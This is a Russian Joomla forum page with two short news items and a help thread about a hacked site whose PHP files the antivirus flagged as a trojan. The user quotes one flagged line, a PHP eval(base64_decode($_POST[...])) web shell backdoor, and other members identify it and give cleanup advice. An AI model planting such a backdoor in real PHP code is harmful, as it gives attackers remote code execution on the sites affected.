Новости Joomla

Как тестировать Joomla PHP-разработчику? Компонент Patch tester.

👩‍💻 Как тестировать Joomla PHP-разработчику? Компонент Patch tester.Joomla - open source PHP-фреймворк с готовой админкой. Его основная разработка ведётся на GitHub. Для того, чтобы международному сообществу разработчиков было удобнее тестировать Pull Requests был создан компонент Patch Tester, который позволяет "накатить" на текущую установку Joomla именно те изменения, которые необходимо протестировать. На стороне инфраструктуры Joomla для каждого PR собираются готовые пакеты, в которых находится ядро + предложенные изменения. В каждом PR обычно находятся инструкции по тестированию: куда зайти, что нажать, ожидаемый результат. Тестировщики могут предположить дополнительные сценарии, исходя из своего опыта и найти баги, о которых сообщить разработчику. Или не найти, и тогда улучшение или исправление ошибки быстрее войдёт в ядро Joomla. Напомню, что для того, чтобы PR вошёл в ядро Joomla нужны минимум 2 положительных теста от 2 участников сообщества, кроме автора. Видео на YouTubeВидео на VK ВидеоВидео на RuTubeКомпонент на GitHub https://github.com/joomla-extensions/patchtester@joomlafeed#joomla #php #webdev #community

Вышел релиз Revo PageBuilder Toolkit for YOOtheme Pro 1.6

Вышел релиз Revo PageBuilder Toolkit for YOOtheme Pro 1.6.2PageBuilder Toolkit - это специализированный плагин для конструктора страниц Yootheme Pro, содержит набор различных утилит для ускорения процесса работы и отладки макета, множественные улучшения в интерфейсе, включая поддержку dark mode, подсказки, быстрая смена разрешения в окне просмотра и много чего еще.v.1.6.2 Что нового?- Индикатор статусов: теперь не просто показывает состояние запросов, но и делает автоматические попытки их отправки при кратковременных сбоях в сети, а если это не помогло, то переводит конструктор в ручной режим, что позволяет сохранит макет и настройки темы прежде чем вы потеряете все, что было сделано с момента последнего сохранения- Подсветка ошибок в макете: плагин анализирует код страницы и может автоматически подсвечивать data атрибуты с кучей мусора, которые попадают в код страницы при копипасте из Figma в TinyMCE (пригодится для старых макетов, в текущей работе плагин сам очищает код мусора). Также есть подсветка семантических ошибок сборки - дубли h1 тега на странице и вложенных друг в друга заголовков.- Улучшена поддержка будущего релиза Yootheme Pro 5 и редактора CodeMirror 6Плагин для русскоязычных пользователей доступен в каталоге расширений SovMart и распространяется за символическую плату (100р). Разработчики Joomla расширений и партнеры автора могут получить плагин бесплатно.Для работы плагина необходим конструктор страниц Yootheme Pro.Разработчик плагина - участник нашего сообщества Александр Судьбинов (@alexrevo), член официальной группы поддержки Yootheme Pro. Страница расширенияОписание на сайте автора@joomlafeed#joomla #yootheme

0 Пользователей и 1 Гость просматривают эту тему.
  • 12 Ответов
  • 1838 Просмотров
*

tmpnikl

  • Захожу иногда
  • 497
  • 4 / 0
начал распаковывать архив скаченный с хоста то половина файлов php попали в карантин с сообщением PHP/Kriptik.AL троянская программа..., в инете кто что пишет, кто пишет, что антивирусники если видят 64 й код, то сразу в карантин, не раскодируя, другие, что лучше удалить..., кто что посоветует?
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Стандарт- антивирус выявил файл с вредоносным кодом.Но код может быть вставлен в нормальный скрипт Joomla/расширения. Поэтому, чтобы сохранить работоспособность сайта, нужно каждый файл сравнивать или заменять, с аналогичным из чистого дистра Joomla.
Или если есть опыт, самостоятельно проверять файл и удалять вредоносный код.
*

vipiusss

  • Гуру
  • 5739
  • 344 / 11
  • Скайп: renor_
1.Не качайте с хоста, есть сайты разработчиков.Вот почему вы верите вашему хосту, а потом темы такие создаёте?
2.Отключите НОД и в нотепаге++ в поиске найдите ваш код
Миграция, установка, обновление версий Joomla  |  Создание сайтов "под ключ"  |  Эксклюзивные заглушки "offline"  |  Работа с "напильником" над шаблонами и расширениями
*

tmpnikl

  • Захожу иногда
  • 497
  • 4 / 0
Я проверил ссылку на сайт д.вебом он лайн, чисто, на хосте антивирусником, тоже чисто, и поэтому немного непонятно, какие должны быть правильные действия..., например вытащил из карантина из папки модули файл, в котором написано
<?php eval(base64_decode($_POST['n726b60']));?>
Joomla я скачал с сайта разработчика, и что я должен проверить каждый файл на base64 и раскодировать?
не могу понять, что сделал не так и что надо сделать? т.к. я ничего не откуда не качал кроме Joomla...
PS: Файлов в карантине больше 100 и каждый проверять и раскодировать ..сложновато...
*

aspidy

  • Завсегдатай
  • 1008
  • 55 / 1
  • Миграция joomla 1.0-1.5-2.5
Или учится самому http://joomlaforum.ru/index.php?topic=239756.0  как убирать вредоносный код или обращаться к специалистам http://joomlaforum.ru/index.php/topic,282477.0.htmlhttp://joomlaforum.ru/index.php/topic,254903.0.html
Мелкий ремонт. skype poisk-plus
*

tmpnikl

  • Захожу иногда
  • 497
  • 4 / 0
спасибо, понятно... Остался один вопрос... этот код однозначно вирус, и тогда я занимаюсь лечением... или это может быть закодированным куском программы(сайт работает и пока проблем не вижу)?, и тогда я занимаюсь изучением замены кода...
*

aspidy

  • Завсегдатай
  • 1008
  • 55 / 1
  • Миграция joomla 1.0-1.5-2.5
спасибо, понятно... Остался один вопрос... этот код однозначно вирус, и тогда я занимаюсь лечением... или это может быть закодированным куском программы(сайт работает и пока проблем не вижу)?, и тогда я занимаюсь изучением замены кода...
По одной строчке сложно сказать, но скорее всего вирус. Посмотрите логи, htaccess прогоните сканером. Тогда будет более понятно
Мелкий ремонт. skype poisk-plus
*

tmpnikl

  • Захожу иногда
  • 497
  • 4 / 0
Понял, однозначного ответа нет, надо смотреть...блин, но с каждым ответом появляются другие вопросы...
Если это может быть не вирус, следовательно это может быть кусок кода программы... Каким образом этот код предстал в таком виде?, из-за какого-нибудь конвертера или ещё как...
Надо ли этот код переконвертировать обратно в обычный код и как это делается(хотя бы  ссылку почитать)
Каким сканером прогонять .htaccess(он у меня в таком виде), т.к. артивирусники ничего плохого в нем не увидели, может это Неправильные антивирусники, и для htaccess, нужен особый сканер...вот этот файл, что в нем может быть опасного...
Спойлер
[свернуть]


И последнее какие логи смотреть, в какой папке и на предмет чего.... посмотреть то посмотрю, но какие строчки в нем искать непонятно... что должно вызвать подозрительность при просмотре логов...
во ещё один файл нашел по пути ....ru\administrator\components\com_joomlapack\backup\.htaccess
deny from all
« Последнее редактирование: 14.05.2015, 05:46:03 от tmpnikl »
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
например вытащил из карантина из папки модули файл, в котором написано
<?php eval(base64_decode($_POST['n726b60']));?>
это вирус.Такой код  в файле дописан или просто файл
*

aspidy

  • Завсегдатай
  • 1008
  • 55 / 1
  • Миграция joomla 1.0-1.5-2.5
Сканер http://joomlaforum.ru/index.php/topic,198048.0.html Поищите по форуму сканеров много
Логи смотрите последние, откуда идут подозрительные движения. Например попытка доступа к админ части. Но логи могут не давать полной картины, если взлом произошёл давно.
Под спойлером стандартный htaccess сравнивайте
Спойлер
[свернуть]
Мелкий ремонт. skype poisk-plus
*

tmpnikl

  • Захожу иногда
  • 497
  • 4 / 0
спасибо, буду смотреть..., а htaccess, что у вас в спулере, что у меня в спулере идентичны...
*

aspidy

  • Завсегдатай
  • 1008
  • 55 / 1
  • Миграция joomla 1.0-1.5-2.5
Проверяйте этот \administrator\components\com_joomlapack\backup\.htaccess
Мелкий ремонт. skype poisk-plus
*

tmpnikl

  • Захожу иногда
  • 497
  • 4 / 0
А что его проверять, выше я написал, что там одна строчка...
deny from all
Запретить всем.... А должно быть так или нет... я не знаю...
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться